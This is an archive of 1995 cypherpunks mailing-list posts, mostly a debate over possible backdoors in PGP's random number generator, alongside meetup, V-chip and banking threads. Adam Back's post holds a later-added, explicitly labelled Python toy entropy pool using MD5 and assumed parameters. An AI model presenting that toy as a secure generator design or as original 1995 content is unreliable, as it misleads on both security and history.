Date: Tue, 1 Aug 95 11:12:32 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Santa Cruz (CSC)
Message-ID: <ac43bbbe120210045621@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



About a month ago I sent out a notice suggesting that we in the greater
Santa Cruz area (Monterey, Carmel, Watsonville, Soquel, Boulder Creek, even
parts of Santa Clara Valley, etc.) have a get-together occasionally, as the
Bay Area meetings are quite far away (and possibly getting further away if
they continue meeting in San Francisco).

Response was better than I'd expected, with 17 people sending me notes
asking to be kept informed of the thing.

I just sent out a notice to them, partly to make sure my mail addresses are
accurate and well-formed, and partly to update them on the meeting time
(which will be Saturday, August 26th, the last Saturday of the month, at my
house in Corralitos, CA).

If you got my "CSC MEETING..." message, then you need do nothing further.
If you did not get it, and wish to, send me a message.

If you know of others in the area who may be interested, forward them this
message.

This mailing list is maintained manually, in Eudora Pro, so send me English
messages, or the best approximation of English you can manage.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Wed, 2 Aug 95 03:05:21 PDT
To: fc@all.net (Fred Cohen)
Subject: some discussion of rannos in PGP (was: of a hole in PGP)
Message-ID: <28643.9508011023@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Fred Cohen <fc@all.net> writes on cpunks:
: PGP is a product that is specifically disliked by the powers that be
: because it provides free access to strong cryptography which is against
: the public policy of the US government.  That means that people in that
: same said government likely feel it is their duty to make certain that
: they can still read PGP mail.

Certainly granted!  Hence persecution of Phil Z.

A bit difficult to achieve in the presence of available source code, I
(and many others) are using PGP compiled by themselves.  That doesn't
prove there are no subtle back-doors but it rules out unsophisticated
backdoors in distributed executables.  (Even such things could be
checked if someone got suspicious, things can be reverse engineered).

Now to the question of what can be done practically to help further
validate PGP's authenticity, and freeness from back-doors.

The way I see it the only attack which you could reasonably expect to
pull off in terms of being subtle enough to hope to get away with
given full access to source is the random number generator.

The code which actually generates the random primes, and converts them
to PGP output format is reasonably short and well defined.  Wouldn't
take long to single step that and watch that nothing happened on the
way out to file.

Encryption is a similarly simple operation, M ^ e % n you could easily
check that manually (with a certain small piece of perl even).  Same
for generation of IDEA keys.

I don't really feel qualified to comment properly on the random number
generation, but to me (I looked at the source in fair detail) it looks
good.

I mean there is real entropy being generated (timing key strokes
against a high speed clock on PCs lower on UNIX systems typically)
and the stirring operation looks good, MD5 + XOR on key.

Presuming that the MD5 implementation is correct?  Seems a pretty good
likelihood to be, it's been given enough real world tests that you
could do a very nice probabilistic statistical confidence test on it.
Which would easily say that it was correct to some huge degree of
certainty.

The legitimacy of using a high frequency clock to time intervals
between key strokes, seems a very good way of generating random
numbers.  I mean there is most definitely *some* entropy being
generated, PGP makes reasonably conservative estimates of the amount
of entropy generated, and stirs the whole number in (not just the
expected entropy).

I'm not saying your comments aren't useful; they are, and analysis and
critique of the random number generation in particular is very
important.  Indeed given the sheer cost of factoring a 2048 bit RSA
modulus, or of brute forcing a 128bit IDEA key, it is indeed a
pertinent question as to whether any kind of brute force attack could
be generated on the random number generation, which could be slightly
cheaper than either of these.  128bits is a lot to play with.

To me it looks good, but then I'm not a cryptographer, and also there
is the kind of "NP problem aspect" to it all in that for reasonably
complex code it will not be apparent whether a proof is possible with
out looking at the specifics.

Still I think some analysis of the random number generation code would
be useful work.  I'm not expecting to see a flaw, but doesn't mean it
shouldn't be entered into with an open mind.

I think it does not fall in the same league as the apparent difficulty
of having a secure sendmail (you said a compromising couple of bugs
seem to get found a couple of times a year), for the reason that what
PGP is doing with its random no generation is well defined, contained
in a few lines of code, and only really relying on a couple of
assertions:

	1) MD5 is itself not inherently flawed
	2) the MD5 implementation is correct
	3) key stroke timings are a source of a safely conservatively
	   estimatable amount of entropy
	4) the key generation method does not narrow the search space
	5) there are no other compromising bugs between key generation
	   of the key and it being written to the keyring

1) Heh, not a lot you can do about that.  Is it or isn't it?  Time
will tell.

2) Seems pretty likely to me there are test strings which come with
the RFC implementation, and it would be unbelievably unlikely that it
should produce the complete set of tests and yet somehow still be
flawed.  Given that there are _no_ branches in the algorithm (ie just
various permutations and bit twiddlings based on the key info, which
get mangled into the digest).

3) Pretty good I think, especially on a PC, which has a higher speed
timer.  Some entropy is surely generated, and with safe entropy
estimation, and cryptographically secure stirring, it sounds pretty
good to me.

4) For RSA keys, I don't think so, unless you believe that strong
primes will again become important.  For current factoring algorithms
strong primes are just as hard to factor as a completely randomly
generated prime, except for certain primes which are in any have an
infinitesimal chance of occurring.  For IDEA keys there is little
value added over a straight ran no, as there are no special properties
which an IDEA key must have.

5) I would assert is relatively trivial to demonstrate, a couple of
hours with a debugger should demonstrate that.  You could do testing
more rigorously, test every branch, so that you have checked that the
outcome is that the key gets written to the keyfile, with various
options, not utterly fool proof of course, but pretty darn good given
the simplicity.

On the more philosophical side, with the idea that you can never be
sure that folks aren't NSA agents with hidden agendas etc, well you
can't be sure.

But the open source and sheer number of folks reading is the best
argument against this.  That means that at least some true blue
cpunks, "live free or die" types will read it in earnest, and examine
very carefully.

Another philosophical argument against PGP having any cleverly hidden
"back-doors" in the form of purposefully weakened ran-no generators or
what have you is that the NSA et al hate PGP with such vehemence.
Heh if they don't like it, it must be good :-)

And remember, say NO to key escrow :-)

(It's no good having an ultra carefully validated PGP if you go to
jail for being caught with a copy on your HD, welcome to the Land of
the Freeh, and all you know.  May happen sooner than expected, then
the only folks using crypto will be the "live free or die" folks, plus
of course the criminals who figure they have more to hide and would
get in more trouble for what they are really up to than for a
"possession of crypto" charge.)

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365
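
A simplified model of the keystroke-timing pool discussed in this thread (conservative entropy credit, the whole sample mixed in, MD5 stirring keyed by the first 64 bytes, stirring before and after use), as an added example that is not PGP's code and not part of the original post. The pool size, the per-keystroke cap, the delta-based estimator and the tick values are assumptions made for the illustration.

```python
"""Added example: toy entropy pool with conservative keystroke credit."""
import hashlib

POOL_BYTES = 256       # assumed pool size for this model
KEY_BYTES = 64         # "the first 64 bytes of the pool as the key"
BLOCK = 16             # length of an MD5 digest
MAX_BITS_PER_KEY = 8   # assumed cap on the credit given to one keystroke


class NeedMoreEntropy(Exception):
    """Raised when more output is requested than has been credited."""


class ToyPool:
    def __init__(self):
        self.pool = bytearray(POOL_BYTES)
        self.pos = 0
        self.credit = 0            # conservative estimate, in bits
        self.last_t = None
        self.last_d1 = None

    def credit_for(self, t):
        """Credit floor(log2) of the smaller of the first- and second-order
        timing differences, so evenly spaced keystrokes earn nothing."""
        d1 = None if self.last_t is None else t - self.last_t
        d2 = None if d1 is None or self.last_d1 is None else d1 - self.last_d1
        self.last_t, self.last_d1 = t, d1
        if d2 is None:
            return 0               # not enough history yet
        smallest = min(abs(d1), abs(d2))
        return min(max(smallest.bit_length() - 1, 0), MAX_BITS_PER_KEY)

    def add_keystroke(self, t_ticks, keycode):
        """Mix the whole sample in, but credit only the estimated bits."""
        sample = t_ticks.to_bytes(8, "big") + bytes([keycode & 0xFF])
        for b in sample:
            self.pool[self.pos] ^= b
            self.pos = (self.pos + 1) % POOL_BYTES
        self.credit += self.credit_for(t_ticks)

    def stir(self):
        """CFB-style pass over the pool with MD5 as the keyed function.
        The key is the old first 64 bytes, which the pass overwrites."""
        key = bytes(self.pool[:KEY_BYTES])
        feedback = bytes(self.pool[-BLOCK:])
        for off in range(0, POOL_BYTES, BLOCK):
            pad = hashlib.md5(key + feedback).digest()
            block = bytes(a ^ b for a, b in zip(self.pool[off:off + BLOCK], pad))
            self.pool[off:off + BLOCK] = block
            feedback = block

    def draw(self, nbytes):
        """Return nbytes of output, stirring before and after use."""
        if nbytes > POOL_BYTES - KEY_BYTES:
            raise ValueError("request larger than the output region")
        if self.credit < 8 * nbytes:
            raise NeedMoreEntropy(
                "need %d more bits: keep typing" % (8 * nbytes - self.credit))
        self.stir()
        out = bytes(self.pool[KEY_BYTES:KEY_BYTES + nbytes])
        self.credit -= 8 * nbytes
        self.stir()
        return out


def credited_bits(ticks, keycode=0x61):
    """Feed a list of timestamps to a fresh pool and return its credit."""
    pool = ToyPool()
    for t in ticks:
        pool.add_keystroke(t, keycode)
    return pool.credit


# Constructed timer readings (in clock ticks) for two typing patterns.
REGULAR_TICKS = [0, 1000, 2000, 3000, 4000, 5000]    # e.g. key auto-repeat
IRREGULAR_TICKS = [0, 1000, 2010, 3013, 4100, 5340]  # human-like jitter

if __name__ == "__main__":
    print("regular:  ", credited_bits(REGULAR_TICKS), "bits")
    print("irregular:", credited_bits(IRREGULAR_TICKS), "bits")
```

Two pools fed identical samples produce identical output, so stirring contributes no unpredictability of its own; only the credited input does.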





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Tue, 1 Aug 95 11:23:03 PDT
To: Ray Cromwell <patl@lcs.mit.edu
Subject: Provably Correct Crypto?
Message-ID: <ac43be3d13021004ec3b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:15 PM 8/1/95, Ray Cromwell wrote:

>  That's a neat metaphor, but it doesn't always apply. It shouldn't
>apply to algorithms which are primitive recursive. Elementary
>algorithms like multiprecision add, sub, multiply, divide, modmult,
>and modexp (the basis of public key encryption) are all provably
>correct and all terminate. (the basis is polynomial operators over a
>ring) It is possible to verify the implementation (assuming the
>correctness of the compiler). Now there could be a "factoring"
>trapdoor in RSA, but that's a trapdoor not in the implementation of
>PGP, but in the algorithm itself. RSA-in-4-lines-perl is probably
                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>provably correct.  To guard against trapdoors in PGP, you should
 ^^^^^^^^^^^^^^^^^
>verify the correctness of the PRNG, Key Generator, and that no private
>key bits or session key bits are leaked. I would suspect this could be
>difficult, but approximations could be determined to within a high
>degree of confidence.

This doesn't seem likely. I mean, doesn't "RSA-in-4-lines-of-Perl" *of
necessity* make use of external library/utility functions? Such as the "dc"
math routines for the PRNG? Part of its compactness is that it makes use of
available libraries.

Anything that "reaches out" to external libraries or utilities would then
have the vulnerabilities of _those_ libraries and utilities, which may or
may not be provably correct themselves. (And the issue of any PRNG being
probably correct or not is of course an interesting, and deep, question.)

I do think the issues of modular design and provable correctness--or
approximations to it--are interesting ones.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Tue, 1 Aug 95 08:31:10 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
In-Reply-To: <199507312340.TAA02533@toxicwaste.media.mit.edu>
Message-ID: <199508011530.LAA00429@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "warlord" == Derek Atkins <warlord@mit.edu> writes:

 warlord> This is where you are very wrong.  I am not saying that "if
 warlord> you can't find any holes it must be secure".  What I am
 warlord> saying is that the source is available, and thousands of
 warlord> people have looked at the source, and none of them have
 warlord> found any holes in it.

While I largely disagree with Dr. Cohen's conclusions, I do think we
should extinguish the "Examine the source!" mantra.

I find it surprising that people so familiar with public key
cryptography would be reassured by the argument, "Here, this algorithm
has been examined by thousands and nobody has found a trap door."
Public key cryptography demonstrates that it is possible, in
principle, to construct an algorithm with a trap door that nobody else
is *ever* going to find.  I wonder whether Rivest could construct a
hash function which only he could invert...  :-)

When an algorithm is essentially defined by a tangle of C code, like
the PGP random number generator, the "Examine the source!" mantra
becomes even more hollow.  Ironically, the fact that it was designed
by competent cryptographers potentially makes it even more dangerous.

Of course, there is no practical alternative at this time.  Maybe
someday your entire operating environment will be formally proven
correct, and the cryptographic algorithms will be provably as hard as
factoring, and factoring will be proven hard, and the system will ask
you to flip a coin and type "0" or "1" every time it needs a random
bit.  But until that day, you will have to decide whom to trust.

Personally, I trust the authors of PGP.  So do most of the people on
this list, I suspect.  Maybe Dr. Cohen can convince me that my trust
is misplaced; but to do so, he will need something better than NSA
conspiracy theories.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WOOD@VAX2.ROCKHURST.EDU
Date: Tue, 1 Aug 95 09:40:32 PDT
To: cypherpunks@toad.com
Subject: Re: commerical busters
Message-ID: <01HTK2WJPWYQ001IQN@VAX2.ROCKHURST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


 
 ON: 31-JUL-1995 20:14:46.10, dan@netmarket.com wrote:
 
> At 8:50 PM 07/31/95, Patrick May wrote:
> 
> >     My dim memories from a project I did for Sony a couple of years
> >ago are that commercials are separated by a fixed number of black
> >frames and some, at least, have tracking information encoded so that
> >advertisers can monitor how often they are played.  I'll try to dig up
> >more info.
> 
> From: dfitzpat@interserv.com
>       Wednesday July 26, 1995 -- ShopTalk
> 
> - --
> 
> NEW VCRs TAKE ON COMMERCIALS POINT-BLANK
> 
>                         By Jonathan Takiff
>                Philadelphia Daily News Staff Writer
> 
> 
> Already besieged by Washington politicians over the content of TV
> programming (and threats of a show-blocking chip), television
> broadcasters are about to be hit with another whammy.  This time it's
> VCRs that automatically blank out commercials.
> 
> <snip>
> 
> $$$$ $$$$$ $$$$
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> -----END PGP SIGNATURE-----
> 
                                                            dan
 Hello all,
 
 I have thought about this before, as usual my ideas are not new.
 My vision was like this.  
 
 1. Develop a few methods to recognize commercials through cable T.V.
 	a. The blank spaces between broadcasting?
 	b. Analysis of image information?
 	c. Analysis of sound information?
 	d. Understanding cable T.V. protocols?
 	e. etc? 
 
 2. My commercial buster would work on a delay.
 	a. The broadcast information would enter a queue.
 	b. The broadcast information would be evaluated.
 	c. If all of the tests for commercials passed, display.
 	d. If any of the tests fail, the T.V. goes blue, and
 		my CD player is served.
 	e. The time of delay is dependent on the time to analyze
 		the broadcast information.
 
 I wish it could happen, I hate commercials.
 
 Many Thanks,
 	

-------------------------------------------
 |   "Computers are boring and slow."    |                     
 |                                       |
 | 	David Wood                       |
 |      Information Systems Specialist?  |
 |  	wood@vax2.rockhurst.edu          |
-------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Tue, 1 Aug 95 08:42:52 PDT
To: patl@lcs.mit.edu
Subject: Re: a hole in PGP
In-Reply-To: <199508011530.LAA00429@skyclad.lcs.mit.edu>
Message-ID: <199508011542.LAA23817@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



"Patrick J. LoPresti" writes:
> I find it surprising that people so familiar with public key
> cryptography would be reassured by the argument, "Here, this algorithm
> has been examined by thousands and nobody has found a trap door."
> Public key cryptography demonstrates that it is possible, in
> principle, to construct an algorithm with a trap door that nobody else
> is *ever* going to find.

This is not correct as you have phrased it.

Although it is not possible to find a decision procedure for any
non-trivial property of programs in general (whether it halts, for
example) in practice well written code can be well understood and
cannot conceal very much at all.

In order to use public key cryptography to obfuscate a program as you
suggest, you'd have to include huge tables of large numbers in it. Any
idiot can observe the existence of such mysterious tables.

Trying to conceal anything in cleanly written code is an enormous
challenge, and one that has nothing to do with public key crypto per
se.

Incidentally, this doesn't mean that you can't conceal things by
producing subtle flaws in, for example, random number generation code.
However, such flaws are hardly of the form "nobody else is *ever*
going to find" -- anyone being extremely cautious in his analysis will
find such flaws.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Tue, 1 Aug 95 08:45:39 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Sex & Crime TV filter
In-Reply-To: <ac425d4208021004ef6c@[205.199.118.202]>
Message-ID: <m0sdJV1-0009ywC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Wow! I think Ted just hit on something that could be used to quickly derail
> the "V-chip":
> 
> At 4:02 PM 7/31/95, Thaddeus J. Beier wrote:
> 
> >The chip that interprets the content does it solely based on the rating
> >information.  This is the so-called "v-chip" (v for violence, I think,
> >not for video) that you see in the press.
> ...
> >qualifications of most people.  Besides, what I would really
> >like to filter out, what I find to be incredibly violent to the
> >minds of children, is commercial advertising.  Private rating
> >services could take care of these, easily, as well.
> 
> I agree, of course, about it not being the role of government/FCC/etc. to
> mandate such ratings, such chips, etc.
> 
> However, to help derail this V-chip being mandated, what if we (I mean
> activists, writers of columns, etc.) "insisted" that _commercials_ be
> similarly labelled?
> 
> "Yes, if violence and sex is to be "voluntarily rated," we think that
> commercial advertising ought to be similarly rated."
> 
> It might be hard for the legislators to avoid the logic of this.
> Advertisers, fearing people would of course mute the commercials, would
> then quietly urge them to drop the whole idea.
> 
> --Tim May
> 
> ..........................................................................
> Timothy C. May         | Crypto Anarchy: encryption, digital money,
> tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
> 408-728-0152           | knowledge, reputations, information markets,
> Corralitos, CA         | black markets, collapse of governments.
> Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 


-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Tue, 1 Aug 95 10:52:32 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: a hole in PGP
In-Reply-To: <Pine.SUN.3.91.950801061213.9088A-100000@panix.com>
Message-ID: <Pine.3.89.9508011141.A5974-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Aug 1995, Duncan Frissell wrote:

> On Mon, 31 Jul 1995, Dr. Frederick B. Cohen wrote:
> 
> > Why (specifically) do you think so? Because you claim it? Because the
> > MIT maintainer claims it? You say MIT is not associated with the NSA,
> > but they have historically been funded by the NSA and other federal
> > agencies for work on information security.  Do you really think that the
> 
> Of course MIT was in the NSA's pocket back in 1978 when they mailed me 
> and 3,000 other people a copy of "A Proposal for a Public Key Encryption 
> System" and started this whole Public Key-Private Key thing.  It was all 
> part of a plot.  If they hadn't done that we might all be using stronger 
> systems today.

Sounds like another LD tentacle to me ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nsb@nsb.fv.com
Date: Tue, 1 Aug 95 09:07:11 PDT
To: Enzo Michelangeli <pgf@tyrell.net>
Subject: Re: Zimmermann legal fund
Message-ID: <9508011604.AB27380@ nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:20 PM 8/1/95 +0800, Enzo Michelangeli wrote:
>Now, my main objection to opening a US account is that it's unclear
>whether or not, for simply receiving payments there, a non-resident and
>non-citizen account holder like myself incurs any tax liability with
>Uncle Sam's Inland Revenue. Can anybody on this list shed light on the 
>issue? Last time I checked, the guys at FV weren't sure either. 

The real question isn't based on your bank account, but on whether or not
Uncle Sam thinks you are "doing business in" the US.  This is the
fundamentally thorny question that is raised by cyberspace businesses. 
Having payments made to a US bank account may make it more likely that the
US will decide that you are doing so, but they could decide it anyway just
because you have buyers in the US, or because you're using a US-based
payment server.  The laws are, to say the least, not clear on such points.

As a practical matter, however, it is true that using a US account will
make it easier for Uncle Sam to tax you if it decides that's appropriate. 
-- NB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 1 Aug 95 09:15:27 PDT
To: patl@lcs.mit.edu
Subject: Re: a hole in PGP
In-Reply-To: <199508011530.LAA00429@skyclad.lcs.mit.edu>
Message-ID: <199508011615.MAA19157@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >>>>> "warlord" == Derek Atkins <warlord@mit.edu> writes:
> 
>  warlord> This is where you are very wrong.  I am not saying that "if
>  warlord> you can't find any holes it must be secure".  What I am
>  warlord> saying is that the source is available, and thousands of
>  warlord> people have looked at the source, and none of them have
>  warlord> found any holes in it.
> 
> While I largely disagree with Dr. Cohen's conclusions, I do think we
> should extinguish the "Examine the source!" mantra.
> 
> I find it surprising that people so familiar with public key
> cryptography would be reassured by the argument, "Here, this algorithm
> has been examined by thousands and nobody has found a trap door."
> Public key cryptography demonstrates that it is possible, in
> principle, to construct an algorithm with a trap door that nobody else
> is *ever* going to find.  I wonder whether Rivest could construct a
> hash function which only he could invert...  :-)

  That's a neat metaphor, but it doesn't always apply. It shouldn't
apply to algorithms which are primitive recursive. Elementary
algorithms like multiprecision add, sub, multiply, divide, modmult,
and modexp (the basis of public key encryption) are all provably
correct and all terminate. (the basis is polynomial operators over a
ring) It is possible to verify the implementation (assuming the
correctness of the compiler). Now there could be a "factoring"
trapdoor in RSA, but that's a trapdoor not in the implementation of
PGP, but in the algorithm itself. RSA-in-4-lines-perl is probably
provably correct.  To guard against trapdoors in PGP, you should
verify the correctness of the PRNG, Key Generator, and that no private
key bits or session key bits are leaked. I would suspect this could be
difficult, but approximations could be determined to within a high
degree of confidence.

-Ray


   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Mon, 31 Jul 95 21:46:21 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Zimmermann legal fund
In-Reply-To: <199508010129.AA00881@tyrell.net>
Message-ID: <Pine.LNX.3.91.950801115138.12351A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Phil Fraering wrote:

>    Date: Mon, 31 Jul 1995 12:12:16 +0800 (HKT)
>    From: Enzo Michelangeli <enzo@ima.com>
> 
>    How could it be worse than with the U.S. of A.?? ;-)
> 
> OK... think about Venezuela. It has bad inflation. It has laws against
> converting local currency to US dollars on the black market, which is
> basically defined as any agency/person/corporate entity exchanging at
> a worse rate than the government rate (at least in Venezuela itself;
[...]

Hey, I was joking: even without arriving to such extremes, banking in
Europe is, more often than not, a much worse experience than in USA. My
point, anyway, was that there are many offshore banking centres where you
may keep accounts denominated in USD, Deutsche Marks, Swiss Francs or
other reputable currencies, and also choose branches of reputable
international banks, even American ones if you like (Citibank, Chase and
many others are represented world-wide). Personally, as a bank I like the
HSBC Holdings group or other "British-overseas" institutions like Standard
Chartered, and as haven currency the Singapore Dollar (due to the very strong
balance sheet of that country). In any case, the depositor may choose.

Unfortunately, the costs of international transfers of funds are still
pretty high, even between branches of the same bank. If I remit funds from
Hong Kong to another country, my bank charges me HKD 100 (around USD 20)
per operation, flat. In other countries there are additional commissions
proportional to the amount (0.125% from Singapore, 0.1% from Macau etc).
Sometimes, charges are levied on incoming remittances too. That situation
is partly dependent on the regulatory framework, and partly on the
oligopolistic nature of the banking business. In any case, it makes
international transfers not viable for the settlement of small bills; that
may be the reason why First Virtual is still stuck with USA-only merchant
accounts. 

Now, my main objection to opening a US account is that it's unclear
whether or not, for simply receiving payments there, a non-resident and
non-citizen account holder like myself incurs any tax liability with
Uncle Sam's Inland Revenue. Can anybody on this list shed light on the 
issue? Last time I checked, the guys at FV weren't sure either. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Tue, 1 Aug 95 09:25:00 PDT
To: lindat@iquest.net (Dr. Linda D. Thompson - American Justice Federation)
Subject: Re: Software Glitch FYI
In-Reply-To: <m0sdBF0-001ehcC@dorite1.iquest.net>
Message-ID: <9508011623.AA01033@waller.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I would think that it is in fact necessary for Congress to fix
their email system.  Asking me to change my work habits to make the
Congressmen's lives easier is a prime example of what's wrong with
Congress.  30 million people should act differently so that
postmaster@house.gov doesn't have to do his job?


| A Congressman's aide called me today to explain that if you send email to all
| the Congressmen's offices at one time, the software at their end causes each
| Congressman to receive 50 copies.
| 
| Please be sure everyone is aware of this glitch.
| 
| To prevent 50 copies from being sent to each Congressman, it is necessary to
| break the mailing list into 5-10 addresses at a time.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Tue, 1 Aug 95 09:34:31 PDT
To: perry@panix.com ("Perry E. Metzger")
Subject: Re: a hole in PGP
In-Reply-To: <199508011542.LAA23817@panix4.panix.com>
Message-ID: <199508011634.MAA00496@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "perry" == "Perry E Metzger" <perry@panix.com> writes:

 perry> "Patrick J. LoPresti" writes:

 >> I find it surprising that people so familiar with public key
 >> cryptography would be reassured by the argument, "Here, this
 >> algorithm has been examined by thousands and nobody has found a
 >> trap door."  Public key cryptography demonstrates that it is
 >> possible, in principle, to construct an algorithm with a trap door
 >> that nobody else is *ever* going to find.

 perry> This is not correct as you have phrased it.

On the contrary, it is *precisely* correct as I have phrased it.

 perry> Although it is not possible to find a decision procedure for
 perry> any non-trivial property of programs in general (whether it
 perry> halts, for example) in practice well written code can be well
 perry> understood and cannot conceal very much at all.

Check my phrasing again.  Note the use of "in principle".

Whether the principle applies in practice is certainly a matter for
debate.  I would point out that 1) PGP is hardly well written code,
and 2) many current cryptographic algorithms make ideal places for
concealing all sorts of things.

 perry> In order to use public key cryptography to obfuscate a program
 perry> as you suggest, you'd have to include huge tables of large
 perry> numbers in it. Any idiot can observe the existence of such
 perry> mysterious tables.

Sorry, I can't resist.  From "md5.c" in the PGP distribution:

/*
 * Start MD5 accumulation.  Set bit count to 0 and buffer to mysterious
 * initialization constants.
 */
void MD5Init(struct MD5Context *ctx)
{
...


(Note: Of course I don't think that MD5 has a back door, but that has
more to do with my trust of Rivest than the fact the algorithm is
public.)

 perry> Trying to conceal anything in cleanly written code is an
 perry> enormous challenge, and one that has nothing to do with public
 perry> key crypto per se.

By "cleanly written code", I presume you mean code which is either
formally proven to be a correct implementation, or code which is so
transparent that it is "obviously" a correct implementation.  PGP's
random number generator is neither.

Moreover, as I precisely mentioned, the algorithms themselves can
conceal back doors.  This has plenty to do with public key
cryptography.  A reduction proof from a known hard problem would make
this virtually impossible, but there is no such proof for PGP's random
number generator.  (Nor for any other algorithm used by PGP, although
I admit RSA comes close.)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Tue, 1 Aug 95 05:50:05 PDT
Subject: Re: Commercial killers
In-Reply-To: <199508010210.WAA28165@hermes.bwh.harvard.edu>
Message-ID: <1995Aug1.123538.8037@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@bwh.harvard.edu> writes:

>	Yes, but the tv stations put in a short period of black &
>silence before returning to the show.  I'm pretty confident that this
>is what the 'zip through commercials' vcrs cue on.

Darned close.  The article I saw said it detects the period of black
and silence and puts a `notch' on the tape at each such switch.  The
notch can be detected at fast-forward speeds.  My question is - what
happens if there is black/silence *between commercials*?  How does
the VCR know that what follows a mark is show or merely the next
commercial?
-- 
Simmons' Law Of Alcoholic Expectations:
  The best stuff always happens after the meeting, when everyone goes to
  the bar.
Corollary: Any meeting which doesn't adjourn to the bar isn't worth going to.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Evans <devans@hclb.demon.co.uk>
Date: Tue, 1 Aug 95 07:32:41 PDT
To: cypherpunks@toad.com
Subject: Re: Mail2news Gates
In-Reply-To: <1ef_9507281405@gigo.com>
Message-ID: <807306266snx@hclb.demon.co.uk>
